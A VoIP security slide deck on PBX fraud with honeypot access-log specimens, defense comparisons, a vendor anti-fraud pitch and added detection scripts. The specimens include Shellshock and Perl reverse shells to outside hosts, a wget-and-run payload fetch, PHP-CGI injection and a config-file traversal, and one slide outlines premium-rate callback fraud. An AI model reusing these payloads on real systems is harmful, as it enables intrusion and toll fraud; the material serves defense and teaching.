No More Fraud! 
Let’s say “enough is enough”
About me 
Flavio E. Goncalves 
CTO of SipPulse 
Turnkey solutions for VoIP providers and Telcos. 
Anti-Fraud Solutions
Objectives 
1. Demonstrate the relevance of the fraud problem. 
2. Using intelligence and grabbing information 
3. Debate the options to solve the problem 
4. Limitations of current solutions 
5. New approaches
Part I - Why should you care? 
Three Images 
1. Bankruptcy 
2. Smashing a car in a pole 
3. The million dollar bill stroke 
4. Business going away 
5. 8 billion dollars
Intelligence grabbed in Honeypots 
Friendly scanner is still responsible for x% of the attacks 
Friendly scanner is not the only one 
X% of the attacks are not easily detected 
New trend in web exploitation 
New trend in competition knock down (Simple SIP Flooding)
Part II - How hackers are getting into your PBX 
#1 – Sip Brute Force 
#2 – Http Exploitation 
#3 – Attacks to phones 
#4 – Caller ID Spoofing 
#5 – Billing/Credit card frauds 
Shodan is an amazing tool for hackers.
TOP 5 PBX Exploits in September/October 
1. Shellshock 
2. PHP/LAMP Injection 
3. SQL injection in Trixbox 
4. Linksys remote code execution 
5. FreePBX Remote Code Execution
#1 Shellshock 
Exploit Date: 09/2014 
Specimen: 
[26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'" 
[26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
#2 SQL injection in Trixbox 
Exploit Date: 03/2014 
Specimen: 
[25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
#3 Linksys Remote Code Execution 
Exploit Date: 02/2014 
Specimen: 
[25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
#4 LAMP Attacks 
Apache/PHP Remote Exploit 
Exploit date: 10/2013 
Specimen: 
POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n 
[26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
#5 CallMeNum (Demo) 
Exploit date: 03/2012 
Specimen: 
GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes/ 
n 
Application: system 
Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"x.y.z.w:4446"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eqncmpn"); system$_ while<>;'
Unknown Exploits 
Jul/2014 
Specimen: 
[03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php 
[03/Jul/2014] "GET /fuxkkk.php 
[03/Jul/2014] "GET /recordings/theme/alexpass.php
Part III - Analyzing Defense Options 
#1 Patching Everything and Upgrade frequently 
#2 Use a Firewall 
#3 Use a Session Border Controller 
#4 Use Encryption 
#5 Use an Anti-Fraud System
#1 Patch Everything, update frequently 
Effectiveness: Low 
Risk: High 
Cost: High 
Comments: Very costly, not effective; new vulnerabilities appear every month.
#2 Use a Firewall or configure iptables properly 
Effectiveness: Medium 
Risk: Medium 
Cost: Medium 
Comments: Absolutely a must do. At least, no Internet access to SSH, no Internet access to HTTP/HTTPS. 
Limitations: No prevention for phone attacks, caller ID spoofing and social engineering.
#3 Use a Session Border Controller 
Effectiveness: Medium 
Risk: Medium 
Cost: Very High 
Comments: SBCs can protect your whole infrastructure and give you a single point to protect. Very effective if you have multiple PBXs/Gateways. 
Limitations: No prevention for phone attacks, caller ID spoofing and social engineering.
#4 Use encryption 
Effectiveness: Medium 
Risk: Medium 
Cost: High if you intend to do mutual authentication 
Comments: Makes sense when applied to SIP trunks and phones. 
Limitations: No prevention for phone attacks, caller ID spoofing and social engineering.
#5 Use an AntiFraud System 
Effectiveness: High 
Risk: Very Low 
Cost: Medium 
Comments: Can detect 99.999% of the attacks; it protects against caller ID spoofing, social engineering and phone attacks. 
Limitations: Firewall restrictions are required to avoid tampering.
Fraud Prevention for All 
www.tfps.co
www.tfps.co || tfps.sippulse.com 
Collaborative/non-collaborative blacklists: Source IP, Dialed Number, Protocol Signatures 
Policies: Hour of the day, Simultaneous Calls, Quota 
Mechanism: SIP Redirect over UDP (<2 ms) 
How-To available for FreeSwitch, Asterisk, OpenSIPS, FreePBX
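As an added example (not SipPulse/TFPS code; the SIP-redirect transport the slide mentions is left out, only the verdict is computed), the Python below shows the per-call decision such a policy layer makes: a source-IP blacklist, a dialed-number blacklist, an hour-of-day window, a simultaneous-call cap and a minutes quota. Every network, prefix, threshold and timestamp in it is a constructed sample value.

```python
"""Added example, not SipPulse/TFPS code: a per-call policy decision of the
kind the slide lists (blacklists, hour of day, simultaneous calls, quota).
Every network, prefix, threshold and timestamp below is a constructed sample."""
from dataclasses import dataclass
from datetime import datetime
from ipaddress import ip_address, ip_network


@dataclass
class Policy:
    blocked_sources: list     # CIDRs on the source-IP blacklist
    blocked_prefixes: tuple   # dialed-number prefixes on the number blacklist
    allowed_hours: range      # local hours in which calls may be placed
    max_simultaneous: int     # concurrent calls allowed per account
    quota_minutes: int        # minutes an account may consume in the period


@dataclass
class AccountState:
    active_calls: int = 0
    minutes_used: int = 0


@dataclass
class CallAttempt:
    source_ip: str
    dialed: str
    when: datetime
    expected_minutes: int = 1   # minutes reserved against the quota up front


def evaluate(policy, state, call):
    """Return (allowed, reason); the first failing rule decides."""
    src = ip_address(call.source_ip)
    if any(src in ip_network(net) for net in policy.blocked_sources):
        return False, "source IP blacklisted"
    if call.dialed.startswith(policy.blocked_prefixes):
        return False, "dialed number blacklisted"
    if call.when.hour not in policy.allowed_hours:
        return False, "outside allowed hours"
    if state.active_calls >= policy.max_simultaneous:
        return False, "simultaneous call limit reached"
    if state.minutes_used + call.expected_minutes > policy.quota_minutes:
        return False, "quota exhausted"
    return True, "ok"


def admit(policy, state, call):
    """Evaluate the call and, if allowed, reserve it against the account state."""
    allowed, reason = evaluate(policy, state, call)
    if allowed:
        state.active_calls += 1
        state.minutes_used += call.expected_minutes
    return reason


SAMPLE_POLICY = Policy(
    blocked_sources=["198.51.100.0/24"],   # constructed (TEST-NET-2)
    blocked_prefixes=("+900",),            # constructed placeholder prefix
    allowed_hours=range(7, 22),            # 07:00 to 21:59 local time
    max_simultaneous=2,
    quota_minutes=120,
)


def run_scenario():
    """Seven constructed call attempts for one account, evaluated in order."""
    state = AccountState()
    day = datetime(2014, 9, 26, 10, 0)     # constructed timestamps
    night = datetime(2014, 9, 26, 3, 0)
    calls = [
        CallAttempt("203.0.113.5", "+15551234567", day),                        # ok
        CallAttempt("198.51.100.9", "+15551234567", day),                       # blacklisted IP
        CallAttempt("203.0.113.5", "+900123456", day),                          # blacklisted number
        CallAttempt("203.0.113.5", "+15551234567", night),                      # 03:00
        CallAttempt("203.0.113.5", "+15551234567", day, expected_minutes=200),  # over quota
        CallAttempt("203.0.113.5", "+15557654321", day),                        # ok, 2nd active call
        CallAttempt("203.0.113.5", "+15557654321", day),                        # 3rd exceeds the cap
    ]
    return [admit(SAMPLE_POLICY, state, c) for c in calls]


if __name__ == "__main__":
    for verdict in run_scenario():
        print(verdict)
```

The ordering of the checks matters in practice: the cheap list lookups run first so a blacklisted source never consumes quota or a call slot, and the quota is reserved at admission time rather than settled after hang-up, which is what keeps a burst of simultaneous attempts from overshooting the limit.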
Compared to other anti-fraud solutions! 
• Pluggable 
• No Additional Hardware 
• Small traffic to be analyzed 
• Small risk, only a few calls can be affected.
ANTI-FRAUD, HOW-TO (DEMO)
e-mail: flavio@sippulse.com 
skype: flaviogoncalves1 
THANK YOU!
Backup Slides
#6 FreePBX 2.x Code Execution 
Specimen: 
[03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
#4 VTIGER Exploit (Lots of variations) 
0001189: Vtiger CRM - php inject vulnerability 
Specimen: 
108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-" 
93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 537 "-" "-"
#4 PHP Code Injection Vulnerability 
Specimen: 
[03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2293.170.130.201%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-" 
Decoded: 
"GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eqnunkn"); system$_ while<>;'
#9 FreePBX Extension Dump Exploitation 
Specimen: 
184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0/admin/cdr/call-comp.php HTTP/1.1" 404 484 "-" "-"
#6 Freeswitch Attacks 
GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-df&template=linksys
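The specimens in Part II and in these backup slides share a handful of recognisable request shapes. As an added example, not code from the deck or from SipPulse, the Python below parses Apache-style access-log lines and flags those shapes so they can be counted or alerted on. The log lines it scans are constructed (TEST-NET addresses, harmless payloads), not the honeypot captures above, and the signature names are labels chosen here, not official ones.

```python
"""Added example, not code from the deck or from SipPulse: a signature scanner
for Apache-style access logs that flags the request shapes seen in the
slides' specimens. The sample lines are constructed (TEST-NET sources)."""
import re
from urllib.parse import unquote, unquote_plus

# Combined log format. The leading "host ident user" fields are optional so
# lines trimmed to just the timestamp (as in the slides) still parse.
LOG_RE = re.compile(
    r'^(?:(?P<host>\S+) \S+ \S+ )?\[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# name -> (field to inspect, pattern). "target" is the percent-decoded
# path?query of the request line, "ua" the User-Agent header.
SIGNATURES = {
    "shellshock_ua":        ("ua",     re.compile(r"\(\)\s*\{")),
    "linksys_tmunblock":    ("target", re.compile(r"^/tmUnblock\.cgi")),
    "php_cgi_args":         ("target", re.compile(r"^/cgi-bin/php\d*\?.*-d (allow_url_include|auto_prepend_file)")),
    "trixbox_meetme":       ("target", re.compile(r"^/web-meetme/conf_cdr\.php")),
    "freepbx_callme":       ("target", re.compile(r"^/recordings/misc/callme_page\.php\?.*callmenum=")),
    "freepbx_api_system":   ("target", re.compile(r"^/admin/config\.php\?.*handler=api.*function=system")),
    "vtiger_traversal":     ("target", re.compile(r"^/vtigercrm/.*(\.\./|\x00)")),
    "freepbx_footer_ip":    ("target", re.compile(r"^/admin/footer\.php\?.*\bip=")),
    "freepbx_cdr_dump":     ("target", re.compile(r"^/admin/cdr/call-log\.php")),
    "freeswitch_provision": ("target", re.compile(r"^/freeswitch/app/provision/")),
}


def decode_target(request):
    """Split 'METHOD target PROTO' and percent-decode the target.
    The query is decoded with unquote_plus because attackers encode spaces
    between -d options as '+' (see the LAMP specimen); the path is not."""
    parts = request.split(" ")
    target = parts[1] if len(parts) >= 2 else request
    path, _, query = target.partition("?")
    decoded = unquote(path)
    if query:
        decoded += "?" + unquote_plus(query)
    return decoded


def classify(line):
    """Return the signature names matching one log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    fields = {"target": decode_target(m.group("request")), "ua": m.group("ua")}
    return [name for name, (where, rx) in SIGNATURES.items() if rx.search(fields[where])]


def scan(lines):
    """Return [(line_number, source_host, [signatures])] for lines that hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = classify(line)
        if names:
            host = LOG_RE.match(line).group("host") or "?"
            hits.append((n, host, names))
    return hits


SAMPLE_LOG = [  # constructed lines: TEST-NET sources, no live payloads
    '192.0.2.10 - - [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; echo probe"',
    '192.0.2.11 - - [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"',
    '192.0.2.12 - - [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7"',
    '192.0.2.14 - - [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=id HTTP/1.1" 404 534 "-" "-"',
    '192.0.2.15 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"',
    '192.0.2.16 - - [26/Sep/2014:09:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '[26/Sep/2014:10:00:00 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=888 HTTP/1.1" 404 400 "-" "-"',
]

if __name__ == "__main__":
    for n, host, names in scan(SAMPLE_LOG):
        print(f"line {n} from {host}: {', '.join(names)}")
```

Two details carry most of the value: the User-Agent is inspected separately from the URL, because Shellshock never touches the path, and the target is percent-decoded before matching, because the LAMP specimen hides every `-d` option behind hex escapes that a plain substring match on the raw line would miss.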
#4 Caller ID Spoofing 
1 - Send 1 million calls and cancel 
2 - Fake the caller ID to a PRN (premium-rate number) 
3 - Wait for the call back.
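As an added example (not from the deck), the Python below looks for this pattern in call detail records: many unanswered inbound rings from one caller ID inside a short window mark that number as bait, and any outbound call back to it is flagged before it can be billed as a premium-rate conversation. The CDRs, the caller ID +88200123456 and the thresholds are constructed, not real premium-rate data.

```python
"""Added example, not from the deck: detecting the 'call, cancel, wait for
the callback' pattern in CDRs. All records and thresholds are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

CANCEL_THRESHOLD = 5                    # unanswered inbound rings from one caller ID ...
CANCEL_WINDOW = timedelta(minutes=10)   # ... within this window flag the number as bait


def find_bait_numbers(cdrs, threshold=CANCEL_THRESHOLD, window=CANCEL_WINDOW):
    """Caller IDs that rang the PBX repeatedly without ever being answered."""
    rings = defaultdict(list)
    for c in cdrs:
        if c["direction"] == "in" and c["disposition"] != "ANSWERED":
            rings[c["caller"]].append(c["time"])
    bait = set()
    for caller, times in rings.items():
        times.sort()
        start = 0                       # sliding window over the sorted timestamps
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                bait.add(caller)
                break
    return bait


def flag_callbacks(cdrs, bait):
    """Outbound calls to a bait number: the point where the fraud costs money."""
    return [c for c in cdrs if c["direction"] == "out" and c["callee"] in bait]


def build_sample():
    """Constructed CDRs: one bait burst, one ordinary missed-call pattern,
    one answered call, and two callbacks (one to the bait number)."""
    base = datetime(2014, 7, 3, 2, 0)   # constructed: 02:00, a quiet hour
    cdrs = []
    for i in range(6):                  # six rings 30 s apart, all cancelled
        cdrs.append({"direction": "in", "caller": "+88200123456", "callee": "201",
                     "disposition": "CANCEL", "time": base + timedelta(seconds=30 * i)})
    for i in range(2):                  # a normal missed-call pattern
        cdrs.append({"direction": "in", "caller": "+15551110000", "callee": "201",
                     "disposition": "NO ANSWER", "time": base + timedelta(minutes=5 * i)})
    cdrs.append({"direction": "in", "caller": "+15552220000", "callee": "201",
                 "disposition": "ANSWERED", "time": base + timedelta(minutes=1)})
    cdrs.append({"direction": "out", "caller": "201", "callee": "+88200123456",
                 "disposition": "ANSWERED", "time": base + timedelta(minutes=20)})
    cdrs.append({"direction": "out", "caller": "201", "callee": "+15551110000",
                 "disposition": "ANSWERED", "time": base + timedelta(minutes=25)})
    return cdrs


def analyze(cdrs):
    """Return (sorted bait numbers, callees of the flagged outbound calls)."""
    bait = find_bait_numbers(cdrs)
    return sorted(bait), [c["callee"] for c in flag_callbacks(cdrs, bait)]


if __name__ == "__main__":
    bait, callbacks = analyze(build_sample())
    print("bait numbers:", bait)
    print("callbacks to bait:", callbacks)
```

The window is what separates bait from an ordinary unanswered caller: two missed calls five minutes apart stay below the threshold, six cancelled rings in under three minutes do not. In a live deployment the bait set would feed the dialed-number blacklist so the callback is refused at admission instead of merely reported afterwards.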
Open Source is a Target! 
We are seeing scans for: 
Vicidial 
Astpp 
phpMyAdmin (hot) 
Tomcat 
Jboss 
FreeSwitch
First way to protect 
1. Make sure your system is protected by a firewall 
   1. Vulnerability scan 
   2. Apply firewall rules to prevent unauthorized access to the server 
   3. Use .htaccess and implement dual authentication
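As an added example, not from the deck, the Python below checks an iptables-save dump for the rule the firewall slides insist on: SSH and HTTP/HTTPS must not be reachable from the Internet. The weak and hardened rulesets are constructed, 203.0.113.0/24 stands in for a management network, and negated matches ("! -s") and ipset/conntrack-based restrictions are out of scope for this first-pass check.

```python
"""Added example, not from the deck: audit an iptables-save dump for
management ports (SSH, HTTP, HTTPS) accepted from any source.
Both rulesets below are constructed; 203.0.113.0/24 is a placeholder
management network (TEST-NET-3)."""
import re

MANAGEMENT_PORTS = {22: "ssh", 80: "http", 443: "https"}
INPUT_RULE = re.compile(r"^-A INPUT (?P<body>.*?)-j (?P<target>\S+)$")
OPTION = re.compile(r"(-{1,2}[A-Za-z-]+) (\S+)")
ANY_SOURCE = {"0.0.0.0/0", "0/0"}


def parse_rule(line):
    """Return ({option: value}, target) for an INPUT rule, else None."""
    m = INPUT_RULE.match(line.strip())
    if not m:
        return None
    return dict(OPTION.findall(m.group("body"))), m.group("target")


def input_policy(ruleset):
    """Default policy of the INPUT chain (':INPUT DROP [0:0]' in the dump)."""
    m = re.search(r"^:INPUT (\S+)", ruleset, re.M)
    return m.group(1) if m else "unknown"


def exposed_management_ports(ruleset):
    """Management ports ACCEPTed without a -s restriction. Negated matches
    ('! -s') and -m set/-m conntrack restrictions are deliberately not
    modelled: this is a first-pass check, not an iptables simulator."""
    findings = []
    for line in ruleset.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        opts, target = parsed
        port = opts.get("--dport", "")
        if target != "ACCEPT" or opts.get("-p") != "tcp" or not port.isdigit():
            continue
        if int(port) in MANAGEMENT_PORTS and opts.get("-s", "0.0.0.0/0") in ANY_SOURCE:
            findings.append((int(port), MANAGEMENT_PORTS[int(port)]))
    return findings


def audit(ruleset):
    return {"input_policy": input_policy(ruleset),
            "exposed": exposed_management_ports(ruleset)}


# Constructed: the "it works, ship it" ruleset, everything open to the world.
WEAK_RULESET = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -p udp -m udp --dport 5060 -j ACCEPT
COMMIT
"""

# Constructed: default DROP, management only from 203.0.113.0/24, SIP and
# RTP still open because the PBX has to take calls from the Internet.
HARDENED_RULESET = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -s 203.0.113.0/24 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 203.0.113.0/24 -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -p udp -m udp --dport 5060 -j ACCEPT
-A INPUT -p udp -m udp --dport 10000:20000 -j ACCEPT
COMMIT
"""

if __name__ == "__main__":
    for name, rules in (("weak", WEAK_RULESET), ("hardened", HARDENED_RULESET)):
        print(name, audit(rules))
```

Run it against the output of `iptables-save` on the PBX host. An INPUT policy of ACCEPT is reported alongside the exposed ports because with that policy an unlisted service is just as reachable as a listed one; the hardened set keeps SIP and RTP open, which is the whole point of the anti-fraud layer the deck goes on to describe.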
#5 SIP Phone Recent Vulnerabilities 
Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10) 
Cisco SPA 3XX, 5XX - http://www.cvedetails.com/cve/CVE-2014-3313/ (4.3) 
Cisco SPA 3XX, 5XX - http://www.cvedetails.com/cve/CVE-2014-3312/ (6.9) 
Yealink - http://www.cvedetails.com/cve/CVE-2014-3427 
Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/

No More Fraud Cluecon2014
